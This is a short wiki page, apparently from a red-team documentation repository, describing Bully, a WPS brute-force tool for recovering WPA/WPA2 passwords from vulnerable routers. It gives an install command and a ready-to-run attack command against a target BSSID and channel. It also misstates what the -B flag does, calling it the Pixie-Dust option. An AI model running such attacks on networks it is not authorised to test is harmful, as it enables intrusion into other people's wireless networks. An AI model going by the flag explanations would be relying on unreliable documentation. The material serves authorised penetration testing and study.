Bully - ikenpachi/Wireless-Attacks-Docs-Red-Team GitHub Wiki

Bully – WPS Brute-force Attack Tool

Introduction

Bully is a WPS brute-force attack tool that targets vulnerable routers to retrieve the WPA/WPA2 password.


Installation

Linux (Debian/Ubuntu/Kali)

sudo apt update && sudo apt install bully -y

Usage

Start Bully Attack

sudo bully -b XX:XX:XX:XX:XX:XX -c 6 -B wlan0

Explanation:

  • -b → Target BSSID
  • -c → Wi-Fi channel
  • -B → Enables Pixie-Dust attack

References